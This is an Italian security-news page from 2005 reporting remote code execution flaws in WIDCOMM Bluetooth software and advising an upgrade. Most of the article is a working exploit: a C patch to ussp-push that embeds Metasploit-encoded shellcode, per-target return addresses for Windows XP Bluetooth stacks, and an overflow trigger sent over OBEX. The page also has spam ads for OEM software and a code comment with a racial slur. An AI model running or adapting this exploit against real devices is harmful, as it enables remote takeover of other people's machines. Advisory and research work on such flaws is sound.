Homepage

|| HOME || NEWS || ARTICOLI|| LIBRI || DOWNLOAD || LINK || FORUM ||

Wi4net

Menu principale

Partner

Microsoft Office 2007 enterprise download Windows 7 Ultimate is the most versatile and powerful edition of Windows 7 buy Adobe Creative Suite 4 OEMIt combines remarkable ease-of-use with the entertainment features of Home Premium and the business capabilities of Professional you can encrypt your data with BitLocker and BitLocker-To-Go. And for extra flexibility, buy Adobe Creative Suite 4 Master Collection oemyou can work in any of 35 languages. Get it all buy Adobe Photoshop CS4 Extended OEMwith Windows 7 Ultimate.

SolidarietÓ

On-line

Ci sono 33 visitatori e
0 utenti on-line

Sei un utente non registrato. Puoi loggarti qui o registrarti liberamente cliccando qui.

Login

 Nickname

 Password

 Ricordami


Non hai ancora un account?
Registrati subito.
Come
utente registrato potrai
cambiare tema grafico
e utilizzare tutti i servizi offerti.

VulnerabilitÓ WIDCOMM Bluetooth Communications Software
Lunedý, 05 Dicembre 2005 - 17:21 - 10392 Letture
Bug
Alcune vulnerabilitÓ sono state riscontrata nel software per comunicazioni Bluetooth WIDCOMM ...

Un remote user potrebbe eseguire codice arbitrario sul sistema terget.
E' stato riscontrato che un remote user mandando delle particolari richieste via Bluetooth sarebbe possibile eseguire codice arbitrario sul sistema.
Soluzione, eseguire l'upgrade alla versione 3.0.
E' disponibile inoltre un exploit per la vulnerabilitÓ remota :

--- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500


@@ -1,4 +1,10 @@
/*
+ http://www.digitalmunition.com
+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest.
+ http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
* UNrooted.net example code
*
* Most of these functions are just rips from the Affix Bluetooth project OBEX


@@ -62,7 +68,10 @@

#include "obex_socket.h"

-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
#define BT_SERVICE "OBEX"
#define OBEX_PUSH 5



@@ -316,6 +325,9 @@
switch (event) {
case OBEX_EV_PROGRESS:
printf("Made some progress...\n");
+ sleep(3);
+ printf("Peace nigga...\n");
+ exit(0);
break;

case OBEX_EV_ABORT:


@@ -382,9 +394,7 @@
name = remote;

name_len = (strlen(name)+1)<<1;
- if( (namebuf = g_malloc(name_len)) ) {
- OBEX_CharToUnicode(namebuf, name, name_len);
- }
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.

buf = easy_readfile(path, &file_size);
if(buf == NULL) {


@@ -424,6 +434,24 @@
return err;
}

+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual...
+{
+ int s = hci_open_dev(hdev);
+
+ if (s < 0) {
+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ if (opt) {
+ if (hci_write_local_name(s, opt, 2000) < 0) {
+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ }
+
+}

/*
* That's all there is to it. With it all setup like this all I have to do


@@ -434,19 +462,87 @@

int main( int argc, char **argv )
{
- if ( argc != 4 ) {
- printf("%s\n\n"
- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
- "\tDEVICE = RFCOMM TTY device file\n"
- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
- "\tLFILE = Local file path\n"
- "\tRFILE = Remote file name\n\n",
- UPUSH_APPNAME, argv[0]);
+/*
+ The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+ # Authentication and Encryption (Security Mode 3)
+ auth disable;
+ encrypt disable;
+*/
+
+ struct
+ {
+ char *os;
+ u_long ret;
+ }
+ targets[] =
+ {
+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+ { "[ Crash ]", 0x41424344 },
+ }, v;
+
+ if ( argc != 3 ) {
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);
+ printf("Types:\n");
+ int i;
+ for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
return( -1 );
}

- printf( "pushing file %s\n", argv[2] );
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */
+ /* this still crashes the BTStackServer.exe... but oh well */
+ unsigned char scode[] =
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+
+ set_device_name(0,0,scode);
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+ //printf( "pushing file.\n");
+
+ char buf[3000];
+ memset(buf,'\0',sizeof(buf));
+ memset(buf,'Z',3); // Sometimes u need 3 z's
+
+ int type = atoi(argv[2]);
+ if(type)
+ {
+ printf("[-] Selected target:\n");
+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);
+ }
+
+ int x;
+ for(x=0; x<=122; x=x+1)
+ {
+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+ }
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+ printf( "error\n" );
+ return( -1 );
+ }
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");
+ sleep(3);
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
printf( "error\n" );
return( -1 );
}
 

Link correlati

Vota l'articolo

Questo articolo non Ŕ stato votato

Login/crea un profilo | 0 Commenti
I commenti sono di proprietÓ dei legittimi autori, che ne sono anche responsabili.

Designed By CMSarea


Tutti i loghi e marchi in questo sito sono di proprietÓ dei rispettivi proprietari.
I commenti sono di proprietÓ dei rispettivi autori, ed il resto ę 2003-2005 di mia proprietÓ
Questo sito Ŕ stato creato con MaxDev, un sistema di gestione di portali scritto in PHP. MD-Pro Ŕ un software libero rilasciato sotto la licenza GNU/GPL Visualizzate le nostre news usando il file backend.php

Licenza Creative Commons
Questo/a opera Ŕ pubblicato sotto una Licenza Creative Commons.

I LOGHI DEL SITO SONO STATI GENTILMENTE CREATI DA MEDIALINKS

Powered by MD-Pro